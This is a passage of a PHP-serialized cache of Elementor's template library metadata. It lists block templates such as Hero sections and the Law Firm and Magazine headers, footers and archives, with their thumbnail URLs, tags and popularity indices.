10\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2018/03/header_2.png\";s:12:\"tmpl_created\";i:1520443586;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/hero-10/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:191;s:16:\"popularity_index\";i:365;s:11:\"trend_index\";i:567;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:617;a:16:{s:4:\"tmpl\";i:527;s:2:\"id\";i:5773;s:5:\"title\";s:7:\"Hero 11\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2018/03/header_1.png\";s:12:\"tmpl_created\";i:1520443584;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/hero-11/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:192;s:16:\"popularity_index\";i:39;s:11:\"trend_index\";i:179;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:618;a:16:{s:4:\"tmpl\";i:479;s:2:\"id\";i:5238;s:5:\"title\";s:7:\"Hero 12\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/form_white_4.png\";s:12:\"tmpl_created\";i:1520443468;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/hero-12/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:8:\"[\"hero\"]\";s:10:\"menu_order\";i:193;s:16:\"popularity_index\";i:611;s:11:\"trend_index\";i:555;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:619;a:16:{s:4:\"tmpl\";i:573;s:2:\"id\";i:6274;s:5:\"title\";s:6:\"Hero 2\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/heroo_black_5.png\";s:12:\"tmpl_created\";i:1520443698;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/hero-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:8:\"[\"hero\"]\";s:10:\"menu_order\";i:194;s:16:\"popularity_index\";i:87;s:11:\"trend_index\";i:88;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:620;a:16:{s:4:\"tmpl\";i:569;s:2:\"id\";i:6239;s:5:\"title\";s:6:\"Hero 3\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/heroo_black_1.png\";s:12:\"tmpl_created\";i:1520443689;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/hero-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:8:\"[\"hero\"]\";s:10:\"menu_order\";i:195;s:16:\"popularity_index\";i:23;s:11:\"trend_index\";i:34;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:621;a:16:{s:4:\"tmpl\";i:571;s:2:\"id\";i:6258;s:5:\"title\";s:6:\"Hero 4\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/heroo_black_3.png\";s:12:\"tmpl_created\";i:1520443693;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/hero-4/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:8:\"[\"hero\"]\";s:10:\"menu_order\";i:196;s:16:\"popularity_index\";i:479;s:11:\"trend_index\";i:470;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:622;a:16:{s:4:\"tmpl\";i:570;s:2:\"id\";i:6249;s:5:\"title\";s:6:\"Hero 5\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/heroo_black_2.png\";s:12:\"tmpl_created\";i:1520443691;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/hero-5/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:8:\"[\"hero\"]\";s:10:\"menu_order\";i:197;s:16:\"popularity_index\";i:56;s:11:\"trend_index\";i:85;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:623;a:16:{s:4:\"tmpl\";i:568;s:2:\"id\";i:6230;s:5:\"title\";s:6:\"Hero 6\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/heroo_white_1.png\";s:12:\"tmpl_created\";i:1520443687;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/hero-6/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:8:\"[\"hero\"]\";s:10:\"menu_order\";i:198;s:16:\"popularity_index\";i:406;s:11:\"trend_index\";i:542;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:624;a:16:{s:4:\"tmpl\";i:530;s:2:\"id\";i:5801;s:5:\"title\";s:6:\"Hero 7\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2018/03/header_4.png\";s:12:\"tmpl_created\";i:1520443589;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/hero-7/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:8:\"[\"hero\"]\";s:10:\"menu_order\";i:199;s:16:\"popularity_index\";i:15;s:11:\"trend_index\";i:37;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:625;a:16:{s:4:\"tmpl\";i:531;s:2:\"id\";i:5811;s:5:\"title\";s:6:\"Hero 8\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2018/03/header_5.png\";s:12:\"tmpl_created\";i:1520443591;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/hero-8/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:200;s:16:\"popularity_index\";i:105;s:11:\"trend_index\";i:86;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:626;a:16:{s:4:\"tmpl\";i:529;s:2:\"id\";i:5792;s:5:\"title\";s:6:\"Hero 9\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2018/03/header_3.png\";s:12:\"tmpl_created\";i:1520443588;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/hero-9/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:201;s:16:\"popularity_index\";i:225;s:11:\"trend_index\";i:244;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:627;a:16:{s:4:\"tmpl\";i:978;s:2:\"id\";i:13251;s:5:\"title\";s:27:\"Interior Design &#8211; 404\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2020/04/404.png\";s:12:\"tmpl_created\";i:1586148737;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/blocks/interior-design-404/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:30:\"[\"Business\",\"Interior Design\"]\";s:10:\"menu_order\";i:202;s:16:\"popularity_index\";i:730;s:11:\"trend_index\";i:795;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:628;a:16:{s:4:\"tmpl\";i:979;s:2:\"id\";i:13244;s:5:\"title\";s:30:\"Interior Design &#8211; Footer\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2020/04/Footer.png\";s:12:\"tmpl_created\";i:1586148742;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/blocks/interior-design-footer/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:39:\"[\"Business\",\"Footer\",\"Interior Design\"]\";s:10:\"menu_order\";i:203;s:16:\"popularity_index\";i:322;s:11:\"trend_index\";i:178;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:629;a:16:{s:4:\"tmpl\";i:980;s:2:\"id\";i:13236;s:5:\"title\";s:30:\"Interior Design &#8211; Header\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2020/06/Header-interior-design.png\";s:12:\"tmpl_created\";i:1586148746;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/blocks/interior-design-header/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:39:\"[\"Business\",\"Header\",\"Interior Design\"]\";s:10:\"menu_order\";i:204;s:16:\"popularity_index\";i:146;s:11:\"trend_index\";i:64;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:630;a:16:{s:4:\"tmpl\";i:977;s:2:\"id\";i:13259;s:5:\"title\";s:36:\"Interior Design &#8211; News Archive\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2020/04/Archiv-Blog.png\";s:12:\"tmpl_created\";i:1586148733;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/blocks/interior-design-news-archive/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:30:\"[\"Business\",\"Interior Design\"]\";s:10:\"menu_order\";i:205;s:16:\"popularity_index\";i:436;s:11:\"trend_index\";i:132;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:631;a:16:{s:4:\"tmpl\";i:976;s:2:\"id\";i:13267;s:5:\"title\";s:35:\"Interior Design &#8211; Single News\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2020/04/Post.png\";s:12:\"tmpl_created\";i:1586148728;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/blocks/interior-design-single-news/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:30:\"[\"Business\",\"Interior Design\"]\";s:10:\"menu_order\";i:206;s:16:\"popularity_index\";i:402;s:11:\"trend_index\";i:108;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:632;a:16:{s:4:\"tmpl\";i:975;s:2:\"id\";i:13274;s:5:\"title\";s:38:\"Interior Design &#8211; Single Project\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2020/04/Single-Project-.png\";s:12:\"tmpl_created\";i:1586148723;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:136:\"https://library.elementor.com/blocks/interior-design-single-project/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:30:\"[\"Business\",\"Interior Design\"]\";s:10:\"menu_order\";i:207;s:16:\"popularity_index\";i:601;s:11:\"trend_index\";i:324;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:633;a:16:{s:4:\"tmpl\";i:1011;s:2:\"id\";i:14058;s:5:\"title\";s:36:\"Japanese restaurant &#8211; 404 page\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2020/06/404-Page.jpg\";s:12:\"tmpl_created\";i:1592290211;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/blocks/japanese-restaurant-404-page/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:38:\"[\"404\",\"Food\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:208;s:16:\"popularity_index\";i:724;s:11:\"trend_index\";i:647;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:634;a:16:{s:4:\"tmpl\";i:1012;s:2:\"id\";i:14050;s:5:\"title\";s:34:\"Japanese restaurant &#8211; Footer\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2020/06/Footer-Small.jpg\";s:12:\"tmpl_created\";i:1592290247;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/blocks/japanese-restaurant-footer/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:41:\"[\"Food\",\"Footer\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:209;s:16:\"popularity_index\";i:317;s:11:\"trend_index\";i:238;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:635;a:16:{s:4:\"tmpl\";i:1013;s:2:\"id\";i:14042;s:5:\"title\";s:34:\"Japanese Restaurant &#8211; Header\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2020/06/japanese-restaurant-header.jpg\";s:12:\"tmpl_created\";i:1592290277;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/blocks/japanese-restaurant-header/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:41:\"[\"Food\",\"Header\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:210;s:16:\"popularity_index\";i:411;s:11:\"trend_index\";i:274;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:636;a:16:{s:4:\"tmpl\";i:914;s:2:\"id\";i:12164;s:5:\"title\";s:20:\"Law Firm &#8211; 404\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2019/11/404.png\";s:12:\"tmpl_created\";i:1572846979;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/blocks/law-firm-404/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:24:\"[\"404\",\"Law\",\"Law Firm\"]\";s:10:\"menu_order\";i:211;s:16:\"popularity_index\";i:704;s:11:\"trend_index\";i:716;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:637;a:16:{s:4:\"tmpl\";i:913;s:2:\"id\";i:12170;s:5:\"title\";s:23:\"Law Firm &#8211; Archiv\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2019/11/archiv.png\";s:12:\"tmpl_created\";i:1572846967;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/blocks/law-firm-archiv/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:18:\"[\"Law\",\"Law Firm\"]\";s:10:\"menu_order\";i:212;s:16:\"popularity_index\";i:431;s:11:\"trend_index\";i:294;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:638;a:16:{s:4:\"tmpl\";i:912;s:2:\"id\";i:12179;s:5:\"title\";s:23:\"Law Firm &#8211; Footer\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2019/11/footer.png\";s:12:\"tmpl_created\";i:1572846958;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/blocks/law-firm-footer/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:27:\"[\"Footer\",\"Law\",\"Law Firm\"]\";s:10:\"menu_order\";i:213;s:16:\"popularity_index\";i:388;s:11:\"trend_index\";i:240;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:639;a:16:{s:4:\"tmpl\";i:911;s:2:\"id\";i:12194;s:5:\"title\";s:23:\"Law Firm &#8211; Header\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2020/06/Header-law-firm.png\";s:12:\"tmpl_created\";i:1572846935;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/blocks/law-firm-header/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:27:\"[\"Header\",\"Law\",\"Law Firm\"]\";s:10:\"menu_order\";i:214;s:16:\"popularity_index\";i:80;s:11:\"trend_index\";i:39;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:640;a:16:{s:4:\"tmpl\";i:910;s:2:\"id\";i:12203;s:5:\"title\";s:30:\"Law Firm &#8211; Search Archiv\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2019/11/search_result.png\";s:12:\"tmpl_created\";i:1572846925;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/blocks/law-firm-search-archiv/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:18:\"[\"Law\",\"Law Firm\"]\";s:10:\"menu_order\";i:215;s:16:\"popularity_index\";i:493;s:11:\"trend_index\";i:433;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:641;a:16:{s:4:\"tmpl\";i:909;s:2:\"id\";i:12212;s:5:\"title\";s:28:\"Law Firm &#8211; Single Post\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2019/11/single.png\";s:12:\"tmpl_created\";i:1572846914;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/blocks/law-firm-single-post/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:18:\"[\"Law\",\"Law Firm\"]\";s:10:\"menu_order\";i:216;s:16:\"popularity_index\";i:326;s:11:\"trend_index\";i:214;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:642;a:16:{s:4:\"tmpl\";i:1022;s:2:\"id\";i:14772;s:5:\"title\";s:35:\"Luxury Real Estate &#8211; 404 page\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2020/07/404.png\";s:12:\"tmpl_created\";i:1595315728;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/blocks/luxury-real-estate-404-page/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:34:\"[\"404\",\"Real estate\",\"Realestate\"]\";s:10:\"menu_order\";i:217;s:16:\"popularity_index\";i:759;s:11:\"trend_index\";i:720;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:643;a:16:{s:4:\"tmpl\";i:1023;s:2:\"id\";i:14779;s:5:\"title\";s:33:\"Luxury Real Estate &#8211; Footer\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2020/07/Footer.png\";s:12:\"tmpl_created\";i:1595315743;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/blocks/luxury-real-estate-footer/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:37:\"[\"Footer\",\"Real estate\",\"Realestate\"]\";s:10:\"menu_order\";i:218;s:16:\"popularity_index\";i:536;s:11:\"trend_index\";i:505;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:644;a:16:{s:4:\"tmpl\";i:1024;s:2:\"id\";i:14790;s:5:\"title\";s:33:\"Luxury Real Estate &#8211; Header\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2020/07/Header.png\";s:12:\"tmpl_created\";i:1595315760;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/blocks/luxury-real-estate-header/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:37:\"[\"Header\",\"Real estate\",\"Realestate\"]\";s:10:\"menu_order\";i:219;s:16:\"popularity_index\";i:101;s:11:\"trend_index\";i:157;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:645;a:16:{s:4:\"tmpl\";i:1026;s:2:\"id\";i:14809;s:5:\"title\";s:45:\"Luxury Real Estate &#8211; Properties Archive\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/07/Properties.png\";s:12:\"tmpl_created\";i:1595315826;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:143:\"https://library.elementor.com/blocks/luxury-real-estate-properties-archive/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:28:\"[\"Real estate\",\"Realestate\"]\";s:10:\"menu_order\";i:220;s:16:\"popularity_index\";i:414;s:11:\"trend_index\";i:420;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:646;a:16:{s:4:\"tmpl\";i:1027;s:2:\"id\";i:14816;s:5:\"title\";s:47:\"Luxury Real Estate &#8211; Property single post\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2020/07/Single-Property-.png\";s:12:\"tmpl_created\";i:1595315847;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:145:\"https://library.elementor.com/blocks/luxury-real-estate-property-single-post/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:28:\"[\"Real estate\",\"Realestate\"]\";s:10:\"menu_order\";i:221;s:16:\"popularity_index\";i:541;s:11:\"trend_index\";i:665;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:647;a:16:{s:4:\"tmpl\";i:1025;s:2:\"id\";i:14799;s:5:\"title\";s:38:\"Luxury Real Estate &#8211; single post\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2020/07/Post.png\";s:12:\"tmpl_created\";i:1595315792;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:136:\"https://library.elementor.com/blocks/luxury-real-estate-single-post/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:28:\"[\"Real estate\",\"Realestate\"]\";s:10:\"menu_order\";i:222;s:16:\"popularity_index\";i:369;s:11:\"trend_index\";i:441;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:648;a:16:{s:4:\"tmpl\";i:950;s:2:\"id\";i:12635;s:5:\"title\";s:20:\"Magazine &#8211; 404\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/01/404_s.png\";s:12:\"tmpl_created\";i:1579060746;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/blocks/magazine-404/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:25:\"[\"404\",\"Blog\",\"Magazine\"]\";s:10:\"menu_order\";i:223;s:16:\"popularity_index\";i:645;s:11:\"trend_index\";i:734;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:649;a:16:{s:4:\"tmpl\";i:949;s:2:\"id\";i:12643;s:5:\"title\";s:24:\"Magazine &#8211; Archiv1\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2020/01/Archiv1_s.png\";s:12:\"tmpl_created\";i:1579060737;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/blocks/magazine-archiv1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:19:\"[\"Blog\",\"Magazine\"]\";s:10:\"menu_order\";i:224;s:16:\"popularity_index\";i:346;s:11:\"trend_index\";i:272;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:650;a:16:{s:4:\"tmpl\";i:946;s:2:\"id\";i:12669;s:5:\"title\";s:23:\"Magazine &#8211; Footer\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2020/01/Footer_s.png\";s:12:\"tmpl_created\";i:1579060715;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/blocks/magazine-footer/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:28:\"[\"Blog\",\"Footer\",\"Magazine\"]\";s:10:\"menu_order\";i:225;s:16:\"popularity_index\";i:442;s:11:\"trend_index\";i:349;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:651;a:16:{s:4:\"tmpl\";i:945;s:2:\"id\";i:12678;s:5:\"title\";s:23:\"Magazine &#8211; Header\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2020/06/Header-magazine.png\";s:12:\"tmpl_created\";i:1579060701;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/blocks/magazine-header/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:28:\"[\"Blog\",\"Header\",\"Magazine\"]\";s:10:\"menu_order\";i:226;s:16:\"popularity_index\";i:295;s:11:\"trend_index\";i:197;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:652;a:16:{s:4:\"tmpl\";i:947;s:2:\"id\";i:12661;s:5:\"title\";s:23:\"Magazine &#8211; 